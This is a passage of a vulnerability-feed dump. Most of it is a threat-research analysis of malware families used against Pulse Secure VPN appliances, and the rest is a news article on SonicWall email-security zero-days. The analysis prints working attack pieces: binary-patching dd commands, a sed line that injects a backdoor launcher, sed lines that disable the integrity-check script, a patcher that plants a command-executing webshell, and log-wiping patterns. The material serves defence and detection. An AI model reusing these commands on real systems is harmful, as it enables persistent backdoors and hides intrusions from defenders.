'\\xE8' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B31)) \nprintf '\\xE2' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B32)) \nprintf '\\x08' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B33)) \nprintf '\\xD0' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B34)) \nprintf '\\xFF' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B35))\n\n##### STEADYPULSE\n\nThe file licenseserverproto.cgi (SHA256: 168976797d5af7071df257e91fcc31ce1d6e59c72ca9e2f50c8b5b3177ad83cc) is a webshell implemented via modification of a legitimate Perl script used by a Pulse Secure tool which enables arbitrary command execution.\n\nThe attacker inserted two blocks of Perl code that implement the webshell. The source code modifications are surrounded by comments that indicate the start and end of inserted code. The comment strings used are ##cgistart1, ##cgiend1, ##cgistart2 and ##cgiend2. Although the exact purpose of these comment strings is unknown, the attacker may use them to facilitate updates to the malicious code or to allow for its quick removal if necessary.\n\n * The Perl script enclosed in the tags ##cgistart1 and ##cgiend1 adds several lines to import Perl modules that are used by the webshell. It also adds a function to parse parameters of received command data.\n * The script enclosed in the tags ##cgistart2 and ##cgiend2 is responsible for checking web requests designed to be executed by the webshell, if present. If no webshell request is found, the script passes execution to the legitimate Perl script for the webpage.\n\nThe webshell portion of the script is invoked when it receives a form submission name=value pair of serverid matching a secret key. This causes the webshell to extract the string passed to it via the QUERY_STRING CGI environment variable. Individual key/value pairs delimited by the &amp; character and are URL decoded. Although the script parses out all key/value pairs it receives, it specifically looks for and extracts data associated with the cmd parameter. If found, it will generate a form containing the extracted cmd to be executed and the previous serverid value along with a form submission button named Run. Upon submission, the webshell will execute the passed command on the victim host's command line and display the results to the attacker before exiting. If no cmd value was extracted, the webshell will simply output a &lt;/pre&gt; HTML tag.\n\n##### PULSECHECK__\n\nThe file secid_canceltoken.cgi (SHA256: a1dcdf62aafc36dd8cf64774dea80d79fb4e24ba2a82adf4d944d9186acd1cc1) is a webshell written in Perl that enables arbitrary command execution. With a properly formatted request, the script will execute webshell code. Otherwise, the legitimate welcome page of the Pulse Secure VPN software is presumably invoked.\n\nThe script checks for web requests using the HTTP POST method and, if found, will further check the HTTP request headers for the CGI environment variable HTTP_X_KEY. If this header matches a backdoor key, then the malware will output the result of the command sent in the variable HTTP_X_CMD. This data is RC4 encrypted and base64-encoded. The passphrase to decrypt is sent in the environment variable HTTP_X_CNT. The webshell will set the content type to Content-type:text/html and the command output printed. Following this, the script exits.\n\n##### QUIETPULSE__\n\nThe file dsserver (SHA256: 9f6ac39707822d243445e30d27b8404466aa69c61119d5308785bf4a464a9ebd) is a legitimate Perl script with malicious modifications to fork the child process /home/bin/dshelper. The dshelper script does not exist on a clean PulseSecure installation, this file is described as QUIETPULSE Utility Script.\n\n##### QUIETPULSE Utility Script__\n\nThe file dshelper (SHA256: c774eca633136de35c9d2cd339a3b5d29f00f761657ea2aa438de4f33e4bbba4) is a shell script invoked by a malicious version of dsserver that primarily functions as a utility script responsible for copying files and executing commands. Like the ATRIUM patcher, this script accesses /tmp/data, a path which is used during a system upgrade. This file is therefore, like the ATRIUM patcher, used by the attacker to maintain persistence. The script is set to execute in a loop where four main checks are executed every two minutes. The checks are as follows:\n\n_Check 1_\n\nIf /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi exists and is non-empty then execute:\n\n * grep -c -s 'system($depara)' /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi\n\nIt checks if the file has the contents system($depara). If the file does not contain this content, then retrieve the first line of the file by executing:\n\n * sed -n 1p /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi\n\nThen copy a file via:\n\n * cp /home/webserver/htdocs/dana-na/auth/compcheckjava.cgi /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi\n\nThen replace the copy\u2019s first line with the one retrieved from the sed above via:\n\n * sed -i 1c\"&lt;varies&gt;\" /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi\n\n_Check 2_\n\nIf /tmp/data/root/home/bin/ exists as a directory, then check if the file /tmp/data/root/home/bin/dshelper does not exist. If it does not exist, then place it there by copying a file via:\n\n * cp -p /home/bin/dshelper /tmp/data/root/home/bin/\n\n_Check 3_\n\nIf /tmp/data/root/home/bin/dsserver exists and is non-empty then execute the following to check if the file does not contain the string exec(\"/home/bin/dshelper\"):\n\n * grep -c -s 'exec(\"/home/bin/dshelper\")' /tmp/data/root/home/bin/dsserver\n\nIf it doesn't then execute to insert the line:\n\n * sed -i 's/for (;;)/my $monpid = fork();\\nif ($monpid == 0) {\\nexec(\\\"\\/home\\/bin\\/dshelper\\\");\\n}\\n&amp;/g' /tmp/data/root/home/bin/dsserver\n\n_Check 4_\n\nIf the file /tmp/data/root/home/bin/check_integrity.sh exists and is non-empty, then check if the file contains the string exit 1 by executing:\n\n * grep -c -s 'exit 1' /tmp/data/root/home/bin/check_integrity.sh\n\nIf the file does contain this content, then execute the following to switch the content to exit 0:\n\n * sed -i 's/exit 1/exit 0/g' /tmp/data/root/home/bin/check_integrity.sh\n\n##### PULSEJUMP\n\nThe file with SHA256: 7fa71a7f76ef63465cfeacf58217e0b66fc71bc81d37c44380a6f572b8a3ec7a is a system information and credential harvesting Perl script. The sample writes information from multiple sources to the file /tmp/dsactiveuser.statementcounters in append mode.\n\nThe sample begins by retrieving all auth servers via the API AuthAdmin::getAllAuthServers. and logs the results. Next, the sample logs all roles via the API DSRole::GeneralAdmin::getRoles and writes the values to the file. The sample may also retrieve and log additional information depending on the device configuration.\n\n##### HARDPULSE\n\nThe file compcheckjava.cgi (SHA256: 1d3ab04e21cfd40aa8d4300a359a09e3b520d39b1496be1e4bc91ae1f6730ecc) has the ability to read and write arbitrary files and may execute arbitrary commands depending on the implementation of a particular library function.\n\nThe sample responds to HTTP GETs and PUTs. The GET path is not relevant, but the PUT path first checks if the incoming requests checkcode POST param is equal to a hardcoded passcode. If this check passes the sample inspects the param hashid to determine if it's non-empty. If non-empty the sample displays a prompt to the user that includes hardware information and then base64 decodes the param hashid and checks it against pulsesecure. If this matches a recoveryToken is generated which is the MD5 hash of 16 random bytes, with the result hash truncated to 8 characters. This token is then displayed to the user via the URL https://ive-host/dana-na/auth/recover[.]cgi?token=&lt;varies&gt; and the sample exits. If this check did not match then the sample passes the base64 decoded data to a routine DSSafe::psystem which may execute shell commands, however this implementation is not provided and is speculation.\n\nIf the param hashid is empty the sample instead checks that the param m is non-empty. If so, it's matched against get and put which will read/write arbitrary files to the host, respectively.\n\n##### ATRIUM\n\nThe file compcheckresult.cgi (SHA256: f2b1bd703c3eb05541ff84ec375573cbdc70309ccb82aac04b72db205d718e90) is a webshell capable of arbitrary command execution. The sample has malicious logic inserted at the end of legitimate logic. The malicious logic inspects all requests of any type looking for the HTTP query parameter id. If this query parameter exists, the sample executes it verbatim on using the system API. The sample does not encode or obfuscate the command in any way. If the query parameter is not found in the request, then the original legitimate logic is invoked.\n\n##### Persistence Patcher\n\nThe file DSUpgrade.pm (SHA256: 224b7c45cf6fe4547d3ea66a12c30f3cb4c601b0a80744154697094e73dbd450) is a patcher utility script responsible for persisting webshells across a system upgrade. We\u2019ve observed variants of this utility targeting the persistence of multiple webshell families, notably ATRIUM, STEADYPULSE, and PULSECHECK. Like previous patchers, this sample uses sed to insert malicious logic. The attacker likely chose DSUpgade.pm to host their patch logic as it is a core file in the system upgrade procedure, ensuring the patch is during updates. The patcher modifies content in /tmp/data as this directory holds the extracted upgrade image the newly upgraded system will boot into. This results in a persistence mechanism which allows the attacker to maintain access to the system across updates.\n\nmy $cmd_x=\"sed -i '/echo_console \\\"Saving package\\\"/i( \nsed -i \\\\\\\\\\'/main();\\\\\\\\\\$/cif(CGI::param(\\\\\\\\\\\\\\\\\\\"id\\\\\\\\\\\\\\\\\\\")){ \nprint \\\\\\\\\\\\\\\\\\\"Cache-Control: no-cache\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n\\\\\\\\\\\\\\\\\\\"; \nprint \\\\\\\\\\\\\\\\\\\"Content-type: text/html\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n\\\\\\\\\\\\\\\\\\\"; \nmy \\\\\\\\\\\\\\\\\\$na=CGI::param(\\\\\\\\\\\\\\\\\\\"id\\\\\\\\\\\\\\\\\\\"); \nsystem(\\\\\\\\\\\\\\\\\\\"\\\\\\\\\\\\\\\\\\$na\\\\\\\\\\\"); \n} else{ \n&amp;main(); \n}\\\\\\\\\\' /tmp/data/root$cgi_p; \ncp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl; \ncp -f /pkg/dspkginstall /tmp/data/root/pkg/; \n)'/pkg/do-install\";\n\nThe patcher also performs additional shell commands for unpacking a compressed package:\n\nsystem(\"/bin/mount -o remount,rw /dev/root /\"); \nsystem(\"/bin/tar\", \"-xzf\", \"/tmp/new-pack.tgz\", \"-C\", \"/tmp\",\"./installer\"); \nsystem(\"cp -f /tmp/installer/do-install /pkg/\"); \nsystem(\"cp -f /tmp/installer/VERSION /pkg/\"); \nsystem(\"cp -f /tmp/installer/sysboot-shlib /pkg/\"); \nsystem(\"cp -f /tmp/installer/losetup /pkg/\");\n\n##### PACEMAKER\n\nThe file memread (SHA256: 68743e17f393d1f85ee937dffacc91e081b5f6f43477111ac96aa9d44826e4d2) is a credential stealer. The sample has the usage information:\n\nUsage: memread [-t time(minute)] [-m size(MB)] [-s sleep_interval(second)]\n\nThe sample starts by setting an alarm that kills the application after a configurable number of minutes, 14 by default. It then enters a loop which reads /proc/ entries every 2 seconds looking for a target application, this interval is also configurable. The target is found by opening /proc/&lt;process_name&gt;/cmdline for each entry in the folder and then reading this file looking for the string dswsd within the command line. Once found the target application's proc/&lt;target_pid&gt;/mem is opened, the process is attached to with PTRACE, then memory read in chunks up to 512 bytes in size. For each chunk, the string 20 30 20 0A 00 ( 0 \\n) is searched for as a needle. If found the sample splits the data by first space, then a dash -. Two dashes are expected to be found, and these are immediately converted into hex numbers, example form: -&lt;number&gt;. If the second number minus the first is &gt; 8191 the sample reads the data starting at the file offset of the first number, up to a size specified by second number minus first number.\n\nOnce the sample has read the process memory and found all memory data of interest the sample detaches PTRACE then the sample begins memory scanning the copied data. The sample tries to locate a sequence of 'flags' in memory one by one to locate what seem to be information the attacker wishes to steal. This information is not known, nor is the structure of it. The sequences scanned for generally have start and end scan sequences which in order scanned for, are:\n\nUSER_START_FLAG: 3C 05 08 75 73 65 72 4E 61 6D 65 05 01 3E 05 00 \nUSER_END_FLAG: 3C 2F 05 08 75 73 65 72 4E 61 6D 65 05 01 3E 00 \nPASSWORD_START_FLAG: 3C 05 08 70 61 73 73 77 6F 72 64 05 01 3E 00 \nPASSWORD_END_FLAG: 3C 2F 05 08 70 61 73 73 77 6F 72 64 05 01 3E 00 \nAUTHNUM_START_FLAG: 3C 05 0A 61 75 74 68 4E 75 6D 62 65 72 05 01 3E 00 \nAUTHNUM_END_FLAG: 3C 2F 05 0A 61 75 74 68 4E 75 6D 62 65 72 05 01 3E 00\n\nIf all these sequences are found, the data between the start and end is extracted and eventually formatted and written to the file /tmp/dsserver-check.statementcounters. The approximate format of this data is:\n\nName:&lt;username&gt; || Pwd:&lt;password&gt; || AuthNum:&lt;authnumber&gt;\\n\n\nThe sample replaces the following URL encoded values with their ascii representation for the password:\n\n&amp;amp; -&gt; &amp; \n&amp;lt; -&gt; &lt; \n&amp;gt; -&gt; &gt;\n\n##### PACEMAKER Launcher Utility\n\nAs part of our investigation into PACEMAKER we were able to retrieve a simple bash script responsible for launching the credential stealer. The launcher script hash SHA256 4c5555955b2e6dc55f52b0c1a3326f3d07b325b112060329c503b294208960ec launches PACEMAKER from a hardcoded path with options specifying a 16MB memory read size and a memory scan interval of 2 seconds, with a variable self-kill time.\n\n#!/bin/bash\n\n/home/bin/memread -t $1 -m 16 -s 2 &amp;\n\n##### THINBLOOD Log Wiper Utility\n\nThe file dsclslog with SHA256 88170125598a4fb801102ad56494a773895059ac8550a983fdd2ef429653f079 is a log wiper utility. The sample provides the usage information:\n\nUsage: dsclslog -f [events|access] -r [Regex1,Regex2,Regex3,...]\n\nThe \u2013f flag specifies if the file log.events.vc0 or log.access.vc0 within the directory /home/runtime/logs should be modified. To perform its log cleaning operations the sample first makes two copies of whichever log file was chosen, but uses .vc1 and .vc2 as the extension for the new files. The file with the .vc1 is used to search for entries that match the given entries, and the file with the .vc2 extension is used as a temporary file where the cleaned log is written. After generating both files and log cleaning is finished the sample executes the following commands via the system API to overwrite the original log with the cleaned version, then removes the intermediate:\n\nmv /home/runtime/logs/log.&lt;logtype&gt;.vc2 \n/home/runtime/logs/log.&lt;logtype&gt;.vc0 \nrm /home/runtime/logs/log.&lt;logtype&gt;.vc1\n\n##### THINBLOOD LogWiper Utility Variant\n\nThe file clear_log.sh (SHA256: 1741dc0a491fcc8d078220ac9628152668d3370b92a8eae258e34ba28c6473b9) is a BASH script responsible for zeroing log lines that match a given regex pattern. The sample is similar to the compiled THINBLOOD Log Wiper but edits logs in-place with sed rather than making temporary copies. The sed commands used are:\n\nsed -i \"s/.\\x00[^\\x00]*&lt;regex_string&gt;[^\\x00]*\\x09.\\x00//g\" /data/runtime/logs/&lt;logfile&gt;\n\nsed -i \"s/\\x&lt;hex_char&gt;\\x00[^\\x00]*$2[^\\x00]*\\x09\\x&lt;hex_char&gt;\\x00//g\" /data/runtime/logs/&lt;logfile&gt;\n\nThe sample embeds the usage information:\n\nusage: /home/bin/bash clear_log.sh [logfile] [keyword(regex)]\n\n##### LOCKPICK\n\nThe file libcrypto.so (SHA256: 2610d0372e0e107053bc001d278ef71f08562e5610691f18b978123c499a74d8) is a shared object containing cryptographic logic from openssl. The sample contains a modification to the routine bnrand_range that breaks the security of the random numbers generated. There are three paths in this routine for generating a random big number between a given range. The first case is unmodified and generates a zeroed big number, the other two cases are patched so that a constant value overwrites the generated random value and always returns success. This breaks the random number generation by replacing it with a value the attacker knows in all cases.\n\n##### LOCKPICK Patcher\n\nThe file with the hash b990f79ce80c24625c97810cb8f161eafdcb10f1b8d9d538df4ca9be387c35e4 is a patcher utility responsible for inserting the malicious logic known as LOCKPICK. The patcher starts by running sed on the integrity checker script built into the appliance to insert an early exit routine. This is inserted by the command sed -i '12aexit 0' /home/bin/check_integrity.sh which when applied causes this script to exit without performing its intended checks. After this the sample uses python file read/write APIs to insert long strings of assembly that represent the logic known as LOCKPICK. This file is different from the other patchers we\u2019ve identified in that it is python and specifically targets system integrity routines.\n\n#### Detecting the Techniques\n\nThe following table contains specific FireEye product detection names for the malware families associated with the exploitation of Pulse Secure VPN device.\n\n**Platform(s) **\n\n| \n\n**Detection Name ** \n \n---|--- \n \nNetwork Security \n\nEmail Security \n\nDetection On Demand \n\nMalware File Scanning \n\nMalware File Storage Scanning \n\n| \n\nFE_APT_Webshell_PL_HARDPULSE_1 \nFEC_APT_Webshell_PL_HARDPULSE_1 \nAPT.Webshell.PL.HARDPULSE\n\nFE_APT_Trojan_PL_PULSEJUMP_1 \nFEC_APT_Trojan_PL_PULSEJUMP_1 \nFE_Trojan_PL_Generic_1\n\nFE_APT_Trojan_PL_RADIALPULSE_1 \nFEC_APT_Trojan_PL_RADIALPULSE_1 \nFE_APT_Trojan_PL_RADIALPULSE_2 \nFE_APT_Trojan_PL_RADIALPULSE_3 \nFEC_APT_Trojan_PL_RADIALPULSE_2 \nFE_APT_Trojan_PL_RADIALPULSE_4 \nFEC_APT_Trojan_PL_RADIALPULSE_3 \nFE_APT_Trojan_PL_RADIALPULSE_5 \nFE_APT_Tool_SH_RADIALPULSE_1 \nFEC_APT_Tool_SH_RADIALPULSE_1\n\nFE_APT_Trojan_Linux32_PACEMAKER_1 \nFE_APT_Trojan_Linux_PACEMAKER_1\n\nFE_APT_Backdoor_Linux32_SLOWPULSE_1 \nFE_APT_Backdoor_Linux32_SLOWPULSE_2 \nFE_APT_Trojan_Linux32_SLOWPULSE_1 \nFE_APT_Tool_Linux32_SLOWPULSE_1\n\nFE_APT_Webshell_PL_STEADYPULSE_1 \nFEC_APT_Webshell_PL_STEADYPULSE_1 \nAPT.Webshell.PL.STEADYPULSE\n\nFE_APT_Trojan_Linux32_LOCKPICK_1\n\nFE_Webshell_PL_ATRIUM_1 \nFEC_Webshell_PL_ATRIUM_1 \nFE_Trojan_SH_ATRIUM_1\n\nFE_APT_Webshell_PL_SLIGHTPULSE_1 \nFEC_APT_Webshell_PL_SLIGHTPULSE_1 \nAPT.Webshell.PL.SLIGHTPULSE\n\nFE_APT_Webshell_PL_PULSECHECK_1 \nFEC_APT_Webshell_PL_PULSECHECK_1\n\nFE_APT_Tool_Linux32_THINBLOOD_1 \nFE_APT_Tool_Linux_THINBLOOD_1 \nFE_APT_Tool_SH_THINBLOOD_1 \nFEC_APT_Tool_SH_THINBLOOD_1 \nAPT.Tool.Linux.THINBLOOD.MVX\n\nFE_APT_Trojan_PL_QUIETPULSE_1 \nFEC_APT_Trojan_PL_QUIETPULSE_1 \nFE_Trojan_SH_Generic_2 \nFEC_Trojan_SH_Generic_3\n\nSuspicious Pulse Secure HTTP request (IPS) \n \nEndpoint Security \n\n| \n\nReal-Time (IOC)\n\n * SLOWPULSE (BACKDOOR)\n * PACEMAKER (LAUNCHER)\n * THINBLOOD (UTILITY) \n \nHelix\n\n| \n\nVPN ANALYTICS [Abnormal Logon] \nEXPLOIT - SONICWALL ES [CVE-2021-20021 Attempt] \nEXPLOIT - SONICWALL ES [CVE-2021-20021 Success] \nEXPLOIT - SONICWALL ES [CVE-2021-20023 Attempt] \nEXPLOIT - SONICWALL ES [CVE-2021-20023 Success] \n \n#### Mandiant Security Validation Actions\n\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.\n\n**VID**\n\n| \n\n**Title** \n \n---|--- \n \nA101-596 \n\n| \n\nMalicious File Transfer - SLOWPULSE, Download, Variant #1 \n \nA101-597 \n\n| \n\nMalicious File Transfer - SLOWPULSE, Download, Variant #2 \n \nA101-598 \n\n| \n\nMalicious File Transfer - SLOWPULSE, Download, Variant #3 \n \nA101-599 \n\n| \n\nMalicious File Transfer - SLOWPULSE, Download, Variant #4 \n \nA101-600 \n\n| \n\nMalicious File Transfer - SLOWPULSE, Download, Variant #5 \n \nA101-601 \n\n| \n\nMalicious File Transfer - SLOWPULSE, Download, Variant #6 \n \nA101-602 \n\n| \n\nMalicious File Transfer - SLOWPULSE, Download, Variant #7 \n \nA101-604 \n\n| \n\nMalicious File Transfer - Pulse Secure Vulnerability, Utility, Download, Variant #1 \n \nA101-605 \n\n| \n\nMalicious File Transfer - RADIALPULSE, Download, Variant #1 \n \nA101-606 \n\n| \n\nMalicious File Transfer - PULSEJUMP, Download, Variant #1 \n \nA101-607 \n\n| \n\nMalicious File Transfer - HARDPULSE, Download, Variant #1 \n \nA101-608 \n\n| \n\nMalicious File Transfer - SLIGHTPULSE, Download, Variant #1 \n \nA101-609 \n\n| \n\nMalicious File Transfer - LOCKPICK, Patcher, Download, Variant #1 \n \nA101-610 \n\n| \n\nMalicious File Transfer - LOCKPICK, Download, Variant #1 \n \nA101-611 \n\n| \n\nMalicious File Transfer - ATRIUM, Patcher, Download, Variant #1 \n \nA101-612 \n\n| \n\nMalicious File Transfer - PACEMAKER, Launcher, Download, Variant #1 \n \nA101-613 \n\n| \n\nMalicious File Transfer - PACEMAKER, Download, Variant #1 \n \nA101-614 \n\n| \n\nMalicious File Transfer - QUIETPULSE Utility, Download, Variant #1 \n \nA101-615 \n\n| \n\nMalicious File Transfer - QUIETPULSE, Download, Variant #1 \n \nA101-616 \n\n| \n\nMalicious File Transfer - STEADYPULSE, Download, Variant #2 \n \nA101-617 \n\n| \n\nMalicious File Transfer - STEADYPULSE, Download, Variant #1 \n \nA101-618 \n\n| \n\nMalicious File Transfer - ATRIUM, Download, Variant #1 \n \nA101-619 \n\n| \n\nMalicious File Transfer - THINBLOOD, Download, Variant #1 \n \nA101-620 \n\n| \n\nMalicious File Transfer - THINBLOOD, Download, Variant #2 \n \nA101-621 \n\n| \n\nMalicious File Transfer - PULSECHECK, Download, Variant #1 \n \nA101-622 \n\n| \n\nMalicious File Transfer - PULSECHECK, Download, Variant #2 \n \nA104-757 \n\n| \n\nHost CLI - QUIETPULSE Utility, Check, Variant #1 \n \nA104-758 \n\n| \n\nHost CLI - QUIETPULSE Utility, Check, Variant #2 \n \nA104-759 \n\n| \n\nHost CLI - QUIETPULSE Utility, Check, Variant #3 \n \nA104-760 \n\n| \n\nHost CLI - QUIETPULSE Utility, Check, Variant #4 \n \n#### Acknowledgements\n\nMandiant would like to thank the Stroz Friedberg DFIR and Security Testing teams for their collaboration with the analysis and research. The team would also like to thank Joshua Villanueva, Regina Elwell, Jonathan Lepore, Dimiter Andonov, Josh Triplett, Jacob Thompson and Michael Dockry for their hard work in analysis and blog content.\n", "modified": "2021-04-20T14:00:00", "published": "2021-04-20T14:00:00", "id": "FIREEYE:9CF80EFF287EE06F7EC0094727FE9C26", "href": "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html", "type": "fireeye", "title": "Check Your Pulse: Suspected APT Actors Leverage Authentication Bypass\nTechniques and Pulse Secure Zero-Day", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2021-04-21T18:40:05", "bulletinFamily": "info", "cvelist": ["CVE-2021-20021", "CVE-2021-20022", "CVE-2021-20023"], "description": "[](<https://thehackernews.com/images/-3QxJBg5NhUQ/YH-xY_DQyWI/AAAAAAAACUQ/uo3005aRBxEMIBH0zB66EnqQNYVtW3ZnQCLcBGAsYHQ/s0/sonicwall-hacking.jpg>)\n\nSonicWall has addressed three critical security vulnerabilities in its hosted and on-premises email security (ES) product that are being actively exploited in the wild.\n\nTracked as CVE-2021-20021 and CVE-2021-20022, the [flaws](<https://www.sonicwall.com/support/product-notification/security-notice-sonicwall-email-security-zero-day-vulnerabilities/210416112932360/>) were discovered and reported to the company by FireEye's Mandiant subsidiary on March 26, 2021, after the cybersecurity firm detected post-exploitation web shell activity on an internet-accessible system within a customer's environment that had SonicWall's ES application running on a Windows Server 2012 installation. A third flaw (CVE-2021-20023) identified by FireEye was disclosed to SonicWall on April 6, 2021.\n\nFireEye is tracking the malicious activity under the moniker UNC2682.\n\n[](<https://go.thn.li/1-300-5> \"password auditor\" )\n\n\"These vulnerabilities were executed in conjunction to obtain administrative access and code execution on a SonicWall ES device,\" researchers Josh Fleischer, Chris DiGiamo, and Alex Pennino [said](<https://www.fireeye.com/blog/threat-research/2021/04/zero-day-exploits-in-sonicwall-email-security-lead-to-compromise.html>).\n\nThe adversary leveraged these vulnerabilities, with intimate knowledge of the SonicWall application, to install a backdoor, access files, and emails, and move laterally into the victim organization's network.\"\n\nA brief summary of the three flaws are below -\n\n * [**CVE-2021-20021**](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0007>) (CVSS score: 9.4) - Allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host\n * [**CVE-2021-20022**](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0008>) (CVSS score: 6.7) - Allows a post-authenticated attacker to upload an arbitrary file to the remote host, and\n * [**CVE-2021-20023**](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0010>) (CVSS score: 6.7) - A directory traversal flaw that allows a post-authenticated attacker to read an arbitrary file on the remote host.\n\nThe administrative access not only enabled the attacker to exploit CVE-2021-20023 to read configuration files, counting those containing information about existing accounts as well as Active Directory credentials but also abuse CVE-2021-20022 to upload a ZIP archive containing a JSP-based web shell called [BEHINDER](<https://www.sangfor.com/en/info-center/blog-center/cyber-security/Behinder-v3-0-Analysis>) that's capable of accepting encrypted command-and-control (C2) communications.\n\n[](<https://go.thn.li/2-728-5> \"password auditor\" )\n\n\"With the addition of a web shell to the server, the adversary had unrestricted access to the command prompt, with the inherited permissions of the NT AUTHORITY\\SYSTEM account,\" FireEye said, adding the attacker then used \"living off the land\" ([LotL](<https://www.paloaltonetworks.com/cyberpedia/what-are-fileless-malware-attacks>)) techniques to harvest credentials, move laterally across the network, and even \"compress a subdirectory [that] contains daily archives of emails processed by SonicWall ES.\"\n\n[](<https://thehackernews.com/images/-aaLAAYAZ5Ug/YH-xu4ZMtGI/AAAAAAAACUY/BO9BcPPCmZwGYxxIvB56KxjxROL5h847QCLcBGAsYHQ/s0/hack.jpg>)\n\nIn the incident observed by the firm, the threat actor is said to have escalated their attack by conducting an internal reconnaissance activity, albeit briefly, prior to being isolated and removed from the environment, thus foiling their mission. The true motive behind the intrusion remains unclear.\n\nSonicWall users are recommended to upgrade to 10.0.9.6173 Hotfix for Windows and 10.0.9.6177 Hotfix for hardware and ESXi virtual appliances. The SonicWall Hosted Email Security product was automatically patched on April 19 and hence no additional action is required.\n\n#### **UPDATE**\n\nThe Milpitas-headquartered network security firm labeled the findings as an outcome of routine collaboration with third-party researchers and forensic analysis firms to ensure its products adhere to the security best practices.\n\n\"Through the course of this process, SonicWall was made aware of and verified certain zero-day vulnerabilities \u2014 in at least one known case, being exploited in the wild \u2014 to its hosted and on-premises email security products,\" the company said in a statement to The Hacker News. \"SonicWall designed, tested and published patches to correct the issues and communicated these mitigations to customers and partners.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-04-21T17:43:43", "published": "2021-04-21T05:07:00", "id": "THN:59B93BC2ED5871A43456C803DE0C2990", "href": "https://thehackernews.com/2021/04/3-zero-day-exploits-hit-sonicwall.html", "type": "thn", "title": "3 Zero-Day Exploits Hit SonicWall Enterprise Email Security Appliances", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}